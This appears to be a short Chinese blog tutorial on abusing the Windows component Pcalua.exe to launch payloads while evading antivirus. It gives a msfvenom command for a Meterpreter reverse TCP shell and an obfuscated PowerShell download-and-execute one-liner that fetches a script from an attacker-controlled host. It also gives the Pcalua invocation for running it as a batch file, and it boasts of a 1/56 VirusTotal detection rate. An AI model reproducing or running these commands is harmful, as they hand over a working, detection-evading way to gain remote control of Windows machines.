当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x01 Pcalua介绍
Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。
默认在C:\Windows\System32\pcalua.exe
0x02 Pcalua使用
命令为
Pcalua -m -a payload
0x03 执行payload
这里选择使用powershell生成payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.10 LPORT=8080 -f psh-reflection > a.ps1
并对powershell命令进行混淆处理。
powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://10.211.55.10/a.ps1''))';IEX ($a+$b)"
然后将该命令写成a.bat批处理,方便执行。metasploit进行监听
在测试机上执行该命令
Pcalua -m -a a.bat
发现只有火绒提示"powershell可执行操作" 放行后msf可上线
放在virustotal.com上a.bat查杀率为1/56
参考链接:
基于白名单Wmic 执行 payload 第十季复现:https://blog.csdn.net/ws13129/article/details/89791442
虽然我们生活在阴沟里,但依然有人仰望星空!